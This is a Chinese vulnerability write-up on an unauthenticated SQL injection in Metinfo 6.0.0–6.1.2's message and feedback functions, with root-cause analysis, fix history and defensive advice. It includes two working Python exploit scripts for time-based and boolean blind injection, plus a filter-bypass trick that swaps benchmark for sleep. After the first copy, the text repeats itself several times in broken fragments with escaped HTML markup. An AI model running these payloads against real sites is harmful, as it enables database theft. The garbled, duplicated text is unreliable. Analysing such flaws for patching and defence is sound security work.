Metinfo 6.0.0-6.1.2 前台SQL注入漏洞分析<\/h1>

漏洞概述<\/h2>
Metinfo 6.0.0至6.1.2版本存在一个严重的前台SQL注入漏洞，该漏洞存在于"在线留言"和"在线反馈"功能中。攻击者无需登录即可利用此漏洞进行SQL注入攻击，获取数据库敏感信息。<\/p>

漏洞影响版本<\/h2>

Metinfo 6.0.0 - 6.1.2<\/li> <\/ul>

漏洞位置<\/h2>

主要漏洞文件：<\/p>

app\/system\/message\/web\/message.class.php<\/code><\/li>

app\/system\/feedback\/web\/feedback.class.php<\/code><\/li>
<\/ul>
漏洞原理分析<\/h2>
1. 在线留言功能注入<\/h3>
漏洞触发点<\/h4>
在message.class.php<\/code>文件中，变量直接拼接在SQL语句中，且验证码检测函数是在SQL语句查询之后执行，导致可以绕过验证码检测进行SQL注入。<\/p>
过滤机制分析<\/h4>
开发者虽然实现了防护措施：<\/p>

使用sqlinsert<\/code>函数检测SQL注入<\/li>
对id<\/code>参数进行is_numeric<\/code>判断<\/li>
<\/ol>
但存在以下问题：<\/p>

sqlinsert<\/code>函数仅对sleep<\/code>关键字进行了处理，可使用benchmark<\/code>函数绕过<\/li>
upfile<\/code>类重新载入$_M['form']<\/code>值时未进行充分过滤<\/li>
<\/ol>
攻击流程<\/h4>

攻击者通过前台"在线留言"功能提交表单<\/li>
在表单中添加id<\/code>字段，值为攻击payload<\/li>
数据经过daddslashes<\/code>函数处理但未充分过滤<\/li>
恶意SQL语句被执行<\/li>
<\/ol>
利用方式<\/h4>

时间盲注<\/strong>：使用benchmark<\/code>函数<\/li>
布尔盲注<\/strong>：通过判断返回结果差异（"反馈已经被关闭"或验证码检测）<\/li>
<\/ol>
2. 在线反馈功能注入<\/h3>
漏洞触发点<\/h4>
在feedback.class.php<\/code>文件中，存在类似的SQL语句拼接问题。<\/p>
额外限制<\/h4>
需要绕过feedback<\/code>类的check_field<\/code>方法检测。<\/p>
利用方式<\/h4>

需要找到有效的columnid<\/code>值<\/li>
需要爆破验证码结合时间盲注<\/li>
<\/ol>
漏洞修复情况<\/h2>
修复时间线<\/h3>


初始修复<\/strong>：2018年5月，官方未更新版本号，偷偷修复代码<\/p>

修复方式：在daddslashes<\/code>方法中对每个参数进行sqlinsert<\/code>处理<\/li>
问题：sqlinsert<\/code>函数仍可绕过<\/li>
<\/ul>
<\/li>

最终修复<\/strong>：MetInfo 6.1.3版本<\/p>

进行了更彻底的修复<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用脚本示例<\/h2>
在线留言利用脚本<\/h3>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/target.com\/message\/index.php?lang=cn"<\/span>
<\/span><\/span>payload =<\/span> "1 and if(ascii(substr(database(),1,1))>100,benchmark(2000000,md5(1)),1)"<\/span>
<\/span><\/span>
<\/span><\/span>data =<\/span> {
<\/span><\/span>    'name'<\/span>: 'test'<\/span>,
<\/span><\/span>    'tel'<\/span>: '123456789'<\/span>,
<\/span><\/span>    'email'<\/span>: 'test@test.com'<\/span>,
<\/span><\/span>    'content'<\/span>: 'test'<\/span>,
<\/span><\/span>    'id'<\/span>: payload
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>r =<\/span> requests.<\/span>post(url, data=<\/span>data)
<\/span><\/span>print(r.<\/span>text)
<\/span><\/span><\/code><\/pre>布尔盲注利用脚本<\/h3>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>url =<\/span> "http:\/\/target.com\/message\/index.php?lang=cn"<\/span>
<\/span><\/span>payload =<\/span> "71 and ascii(substr(database(),1,1))>100"<\/span>
<\/span><\/span>
<\/span><\/span>data =<\/span> {
<\/span><\/span>    'name'<\/span>: 'test'<\/span>,
<\/span><\/span>    'tel'<\/span>: '123456789'<\/span>,
<\/span><\/span>    'email'<\/span>: 'test@test.com'<\/span>,
<\/span><\/span>    'content'<\/span>: 'test'<\/span>,
<\/span><\/span>    'id'<\/span>: payload
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>r =<\/span> requests.<\/span>post(url, data=<\/span>data)
<\/span><\/span>if<\/span> "反馈已经被关闭"<\/span> in<\/span> r.<\/span>text:
<\/span><\/span>    print("False condition"<\/span>)
<\/span><\/span>else<\/span>:
<\/span><\/span>    print("True condition"<\/span>)
<\/span><\/span><\/code><\/pre>防御建议<\/h2>

升级到MetInfo 6.1.3或更高版本<\/li>
对所有用户输入使用参数化查询<\/li>
实现多层防御机制，包括：

输入验证<\/li>
输出编码<\/li>
最小权限原则<\/li>
<\/ul>
<\/li>
<\/ol>
技术要点总结<\/h2>

漏洞本质<\/strong>：未充分过滤的用户输入直接拼接SQL语句<\/li>
绕过技巧<\/strong>：

使用benchmark<\/code>代替sleep<\/code>绕过sqlinsert<\/code>检测<\/li>
利用程序逻辑缺陷绕过is_numeric<\/code>检查<\/li>
<\/ul>
<\/li>
利用方式<\/strong>：

时间盲注<\/li>
布尔盲注<\/li>
验证码爆破（针对反馈功能）<\/li>
<\/ul>
<\/li>
<\/ol>
参考资源<\/h2>

MySQL时间盲注技术<\/a><\/li>
Metinfo官方更新日志<\/li>
PHP安全编码最佳实践<\/li>
<\/ol>

Metinfo 6.0.0-6.1.2 前台SQL注入漏洞分析<\/h1>

漏洞概述<\/h2>
Metinfo 6.0.0至6.1.2版本存在一个严重的前台SQL注入漏洞，该漏洞存在于"在线留言"和"在线反馈"功能中。攻击者无需登录即可利用此漏洞进行SQL注入攻击，获取数据库敏感信息。<\/p>

漏洞原理分析<\/h2>

1. 在线留言功能注入<\/h3>

漏洞触发点<\/h4>
在`message.class.php<\/code>文件中，变量直接拼接在SQL语句中，且验证码检测函数是在SQL语句查询之后执行，导致可以绕过验证码检测进行SQL注入。<\/p>`

2. 在线反馈功能注入<\/h3>

漏洞触发点<\/h4>
在`feedback.class.php<\/code>文件中，存在类似的SQL语句拼接问题。<\/p>`

漏洞修复情况<\/h2>

漏洞利用脚本示例<\/h2>

参考资源<\/h2>

MySQL时间盲注技术<\/a><\/li>
Metinfo官方更新日志<\/li>
PHP安全编码最佳实践<\/li> <\/ol>

Metinfo 6.0.0-6.1.2 前台SQL注入漏洞分析<\/h1>

漏洞概述<\/h2> Metinfo 6.0.0至6.1.2版本存在一个严重的前台SQL注入漏洞，该漏洞存在于"在线留言"和"在线反馈"功能中。攻击者无需登录即可利用此漏洞进行SQL注入攻击，获取数据库敏感信息。<\/p>

漏洞原理分析<\/h2>

1. 在线留言功能注入<\/h3>

漏洞触发点<\/h4> 在message.class.php<\/code>文件中，变量直接拼接在SQL语句中，且验证码检测函数是在SQL语句查询之后执行，导致可以绕过验证码检测进行SQL注入。<\/p>

2. 在线反馈功能注入<\/h3>

漏洞触发点<\/h4> 在feedback.class.php<\/code>文件中，存在类似的SQL语句拼接问题。<\/p>

漏洞修复情况<\/h2>

漏洞利用脚本示例<\/h2>

参考资源<\/h2> MySQL时间盲注技术<\/a><\/li> Metinfo官方更新日志<\/li> PHP安全编码最佳实践<\/li> <\/ol>

漏洞概述<\/h2>
Metinfo 6.0.0至6.1.2版本存在一个严重的前台SQL注入漏洞，该漏洞存在于"在线留言"和"在线反馈"功能中。攻击者无需登录即可利用此漏洞进行SQL注入攻击，获取数据库敏感信息。<\/p>

漏洞触发点<\/h4>
在`message.class.php<\/code>文件中，变量直接拼接在SQL语句中，且验证码检测函数是在SQL语句查询之后执行，导致可以绕过验证码检测进行SQL注入。<\/p>`

漏洞触发点<\/h4>
在`feedback.class.php<\/code>文件中，存在类似的SQL语句拼接问题。<\/p>`

参考资源<\/h2>

MySQL时间盲注技术<\/a><\/li>
Metinfo官方更新日志<\/li>
PHP安全编码最佳实践<\/li> <\/ol>